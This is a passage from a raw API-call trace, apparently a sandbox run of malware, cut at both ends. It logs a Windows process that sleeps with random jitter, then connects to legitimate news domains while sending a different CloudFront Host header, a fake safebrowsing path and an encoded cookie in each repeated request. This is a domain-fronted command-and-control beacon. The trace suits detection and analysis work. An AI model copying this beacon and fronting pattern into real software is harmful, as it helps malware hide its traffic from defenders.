[0434.409] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0434.409] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x23, wSecond=0x3a, wMilliseconds=0x2de))
[0434.409] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383930) returned 1
[0434.410] CryptGenRandom (in: hProv=0x383930, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0434.410] CryptReleaseContext (hProv=0x383930, dwFlags=0x0) returned 1
[0434.410] Sleep (dwMilliseconds=0x38b0)
[0444.422] GetLastError () returned 0x0
[0444.422] SetLastError (dwErrCode=0x0)
[0444.422] GetLastError () returned 0x0
[0444.422] SetLastError (dwErrCode=0x0)
[0444.422] GetLastError () returned 0x0
[0444.422] SetLastError (dwErrCode=0x0)
[0444.422] GetLastError () returned 0x0
[0444.422] SetLastError (dwErrCode=0x0)
[0444.422] GetLastError () returned 0x0
[0444.422] SetLastError (dwErrCode=0x0)
[0444.422] GetLastError () returned 0x0
[0444.422] SetLastError (dwErrCode=0x0)
[0444.422] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0444.422] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0444.422] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0444.423] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0444.423] GetLastError () returned 0x0
[0444.423] SetLastError (dwErrCode=0x0)
[0444.423] htonl (hostlong=0xa000000) returned 0xa
[0444.423] htonl (hostlong=0x22000000) returned 0x22
[0444.423] GetLastError () returned 0x0
[0444.423] SetLastError (dwErrCode=0x0)
[0444.423] htonl (hostlong=0xa000000) returned 0xa
[0444.423] htonl (hostlong=0x47000000) returned 0x47
[0444.423] GetLastError () returned 0x0
[0444.423] SetLastError (dwErrCode=0x0)
[0444.423] htonl (hostlong=0xa000000) returned 0xa
[0444.423] htonl (hostlong=0x1f000000) returned 0x1f
[0444.423] GetLastError () returned 0x0
[0444.423] SetLastError (dwErrCode=0x0)
[0444.423] htonl (hostlong=0x7000000) returned 0x7
[0444.423] htonl (hostlong=0x0) returned 0x0
[0444.423] htonl (hostlong=0x8000000) returned 0x8
[0444.423] htonl (hostlong=0x2000000) returned 0x2
[0444.423] htonl (hostlong=0x8000000) returned 0x8
[0444.423] htonl (hostlong=0x6000000) returned 0x6
[0444.423] htonl (hostlong=0x6000000) returned 0x6
[0444.423] GetLastError () returned 0x0
[0444.423] SetLastError (dwErrCode=0x0)
[0444.423] htonl (hostlong=0x0) returned 0x0
[0444.423] GetLastError () returned 0x0
[0444.423] SetLastError (dwErrCode=0x0)
[0444.423] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0444.423] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0444.423] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0444.423] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0445.090] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0445.090] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0445.090] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0445.090] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x9, wMilliseconds=0x196))
[0445.090] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0445.090] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0445.090] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x9, wMilliseconds=0x196))
[0445.090] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3838a8) returned 1
[0445.090] CryptGenRandom (in: hProv=0x3838a8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0445.090] CryptReleaseContext (hProv=0x3838a8, dwFlags=0x0) returned 1
[0445.090] Sleep (dwMilliseconds=0x3001)
[0455.093] GetLastError () returned 0x0
[0455.093] SetLastError (dwErrCode=0x0)
[0455.093] GetLastError () returned 0x0
[0455.093] SetLastError (dwErrCode=0x0)
[0455.093] GetLastError () returned 0x0
[0455.093] SetLastError (dwErrCode=0x0)
[0455.093] GetLastError () returned 0x0
[0455.093] SetLastError (dwErrCode=0x0)
[0455.093] GetLastError () returned 0x0
[0455.093] SetLastError (dwErrCode=0x0)
[0455.093] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0455.093] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0455.093] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0455.093] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0455.093] GetLastError () returned 0x0
[0455.093] SetLastError (dwErrCode=0x0)
[0455.093] htonl (hostlong=0xa000000) returned 0xa
[0455.093] htonl (hostlong=0x22000000) returned 0x22
[0455.093] GetLastError () returned 0x0
[0455.093] SetLastError (dwErrCode=0x0)
[0455.093] htonl (hostlong=0xa000000) returned 0xa
[0455.093] htonl (hostlong=0x47000000) returned 0x47
[0455.093] GetLastError () returned 0x0
[0455.094] SetLastError (dwErrCode=0x0)
[0455.094] htonl (hostlong=0xa000000) returned 0xa
[0455.094] htonl (hostlong=0x1f000000) returned 0x1f
[0455.094] GetLastError () returned 0x0
[0455.094] SetLastError (dwErrCode=0x0)
[0455.094] htonl (hostlong=0x7000000) returned 0x7
[0455.094] htonl (hostlong=0x0) returned 0x0
[0455.094] htonl (hostlong=0x8000000) returned 0x8
[0455.094] htonl (hostlong=0x2000000) returned 0x2
[0455.094] htonl (hostlong=0x8000000) returned 0x8
[0455.094] htonl (hostlong=0x6000000) returned 0x6
[0455.094] htonl (hostlong=0x6000000) returned 0x6
[0455.094] GetLastError () returned 0x0
[0455.094] SetLastError (dwErrCode=0x0)
[0455.094] htonl (hostlong=0x0) returned 0x0
[0455.094] GetLastError () returned 0x0
[0455.094] SetLastError (dwErrCode=0x0)
[0455.094] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0455.094] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0455.094] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0455.094] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0455.794] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0455.794] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0455.794] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0455.794] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x14, wMilliseconds=0x71))
[0455.794] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0455.794] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0455.794] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x14, wMilliseconds=0x71))
[0455.794] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383bd8) returned 1
[0455.794] CryptGenRandom (in: hProv=0x383bd8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0455.794] CryptReleaseContext (hProv=0x383bd8, dwFlags=0x0) returned 1
[0455.795] Sleep (dwMilliseconds=0x3271)
[0465.800] GetLastError () returned 0x0
[0465.800] SetLastError (dwErrCode=0x0)
[0465.800] GetLastError () returned 0x0
[0465.800] SetLastError (dwErrCode=0x0)
[0465.800] GetLastError () returned 0x0
[0465.800] SetLastError (dwErrCode=0x0)
[0465.800] GetLastError () returned 0x0
[0465.800] SetLastError (dwErrCode=0x0)
[0465.800] GetLastError () returned 0x0
[0465.800] SetLastError (dwErrCode=0x0)
[0465.800] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0465.800] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0465.800] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0465.800] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0465.800] GetLastError () returned 0x0
[0465.800] SetLastError (dwErrCode=0x0)
[0465.800] htonl (hostlong=0xa000000) returned 0xa
[0465.801] htonl (hostlong=0x22000000) returned 0x22
[0465.801] GetLastError () returned 0x0
[0465.801] SetLastError (dwErrCode=0x0)
[0465.801] htonl (hostlong=0xa000000) returned 0xa
[0465.801] htonl (hostlong=0x47000000) returned 0x47
[0465.801] GetLastError () returned 0x0
[0465.801] SetLastError (dwErrCode=0x0)
[0465.801] htonl (hostlong=0xa000000) returned 0xa
[0465.801] htonl (hostlong=0x1f000000) returned 0x1f
[0465.801] GetLastError () returned 0x0
[0465.801] SetLastError (dwErrCode=0x0)
[0465.801] htonl (hostlong=0x7000000) returned 0x7
[0465.801] htonl (hostlong=0x0) returned 0x0
[0465.801] htonl (hostlong=0x8000000) returned 0x8
[0465.801] htonl (hostlong=0x2000000) returned 0x2
[0465.801] htonl (hostlong=0x8000000) returned 0x8
[0465.801] htonl (hostlong=0x6000000) returned 0x6
[0465.801] htonl (hostlong=0x6000000) returned 0x6
[0465.801] GetLastError () returned 0x0
[0465.801] SetLastError (dwErrCode=0x0)
[0465.801] htonl (hostlong=0x0) returned 0x0
[0465.801] GetLastError () returned 0x0
[0465.801] SetLastError (dwErrCode=0x0)
[0465.801] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0465.801] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0465.801] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0465.801] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0466.517] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0466.517] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0466.517] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0466.517] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x1e, wMilliseconds=0x33f))
[0466.517] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0466.517] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0466.517] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x1e, wMilliseconds=0x33f))
[0466.517] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383138) returned 1
[0466.517] CryptGenRandom (in: hProv=0x383138, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0466.517] CryptReleaseContext (hProv=0x383138, dwFlags=0x0) returned 1
[0466.517] Sleep (dwMilliseconds=0x36fa)
[0476.531] GetLastError () returned 0x0
[0476.531] SetLastError (dwErrCode=0x0)
[0476.531] GetLastError () returned 0x0
[0476.531] SetLastError (dwErrCode=0x0)
[0476.531] GetLastError () returned 0x0
[0476.531] SetLastError (dwErrCode=0x0)
[0476.531] GetLastError () returned 0x0
[0476.531] SetLastError (dwErrCode=0x0)
[0476.531] GetLastError () returned 0x0
[0476.531] SetLastError (dwErrCode=0x0)
[0476.531] GetLastError () returned 0x0
[0476.531] SetLastError (dwErrCode=0x0)
[0476.531] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0476.531] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0476.531] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0476.531] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0476.531] GetLastError () returned 0x0
[0476.531] SetLastError (dwErrCode=0x0)
[0476.531] htonl (hostlong=0xa000000) returned 0xa
[0476.531] htonl (hostlong=0x22000000) returned 0x22
[0476.531] GetLastError () returned 0x0
[0476.531] SetLastError (dwErrCode=0x0)
[0476.531] htonl (hostlong=0xa000000) returned 0xa
[0476.531] htonl (hostlong=0x47000000) returned 0x47
[0476.532] GetLastError () returned 0x0
[0476.532] SetLastError (dwErrCode=0x0)
[0476.532] htonl (hostlong=0xa000000) returned 0xa
[0476.532] htonl (hostlong=0x1f000000) returned 0x1f
[0476.532] GetLastError () returned 0x0
[0476.532] SetLastError (dwErrCode=0x0)
[0476.532] htonl (hostlong=0x7000000) returned 0x7
[0476.532] htonl (hostlong=0x0) returned 0x0
[0476.532] htonl (hostlong=0x8000000) returned 0x8
[0476.532] htonl (hostlong=0x2000000) returned 0x2
[0476.532] htonl (hostlong=0x8000000) returned 0x8
[0476.532] htonl (hostlong=0x6000000) returned 0x6
[0476.532] htonl (hostlong=0x6000000) returned 0x6
[0476.532] GetLastError () returned 0x0
[0476.532] SetLastError (dwErrCode=0x0)
[0476.532] htonl (hostlong=0x0) returned 0x0
[0476.532] GetLastError () returned 0x0
[0476.532] SetLastError (dwErrCode=0x0)
[0476.532] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0476.532] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0476.532] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0476.532] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0477.331] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0477.331] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0477.331] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0477.331] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x29, wMilliseconds=0x28c))
[0477.331] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0477.331] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0477.331] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x29, wMilliseconds=0x28c))
[0477.332] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3833e0) returned 1
[0477.332] CryptGenRandom (in: hProv=0x3833e0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0477.332] CryptReleaseContext (hProv=0x3833e0, dwFlags=0x0) returned 1
[0477.332] Sleep (dwMilliseconds=0x3586)
[0487.347] GetLastError () returned 0x0
[0487.347] SetLastError (dwErrCode=0x0)
[0487.347] GetLastError () returned 0x0
[0487.347] SetLastError (dwErrCode=0x0)
[0487.347] GetLastError () returned 0x0
[0487.347] SetLastError (dwErrCode=0x0)
[0487.347] GetLastError () returned 0x0
[0487.347] SetLastError (dwErrCode=0x0)
[0487.347] GetLastError () returned 0x0
[0487.347] SetLastError (dwErrCode=0x0)
[0487.347] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0487.347] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0487.347] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0487.347] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0487.347] GetLastError () returned 0x0
[0487.347] SetLastError (dwErrCode=0x0)
[0487.348] htonl (hostlong=0xa000000) returned 0xa
[0487.348] htonl (hostlong=0x22000000) returned 0x22
[0487.348] GetLastError () returned 0x0
[0487.348] SetLastError (dwErrCode=0x0)
[0487.348] htonl (hostlong=0xa000000) returned 0xa
[0487.348] htonl (hostlong=0x47000000) returned 0x47
[0487.348] GetLastError () returned 0x0
[0487.348] SetLastError (dwErrCode=0x0)
[0487.348] htonl (hostlong=0xa000000) returned 0xa
[0487.348] htonl (hostlong=0x1f000000) returned 0x1f
[0487.348] GetLastError () returned 0x0
[0487.348] SetLastError (dwErrCode=0x0)
[0487.348] htonl (hostlong=0x7000000) returned 0x7
[0487.348] htonl (hostlong=0x0) returned 0x0
[0487.348] htonl (hostlong=0x8000000) returned 0x8
[0487.348] htonl (hostlong=0x2000000) returned 0x2
[0487.348] htonl (hostlong=0x8000000) returned 0x8
[0487.348] htonl (hostlong=0x6000000) returned 0x6
[0487.348] htonl (hostlong=0x6000000) returned 0x6
[0487.348] GetLastError () returned 0x0
[0487.348] SetLastError (dwErrCode=0x0)
[0487.348] htonl (hostlong=0x0) returned 0x0
[0487.348] GetLastError () returned 0x0
[0487.348] SetLastError (dwErrCode=0x0)
[0487.348] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0487.348] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0487.348] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0487.348] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0488.022] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0488.022] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0488.022] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0488.022] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x34, wMilliseconds=0x15b))
[0488.022] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0488.022] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0488.022] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x24, wSecond=0x34, wMilliseconds=0x15b))
[0488.023] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383248) returned 1
[0488.023] CryptGenRandom (in: hProv=0x383248, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0488.023] CryptReleaseContext (hProv=0x383248, dwFlags=0x0) returned 1
[0488.023] Sleep (dwMilliseconds=0x38b1)
[0498.036] GetLastError () returned 0x0
[0498.036] SetLastError (dwErrCode=0x0)
[0498.036] GetLastError () returned 0x0
[0498.036] SetLastError (dwErrCode=0x0)
[0498.036] GetLastError () returned 0x0
[0498.036] SetLastError (dwErrCode=0x0)
[0498.036] GetLastError () returned 0x0
[0498.036] SetLastError (dwErrCode=0x0)
[0498.036] GetLastError () returned 0x0
[0498.036] SetLastError (dwErrCode=0x0)
[0498.036] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
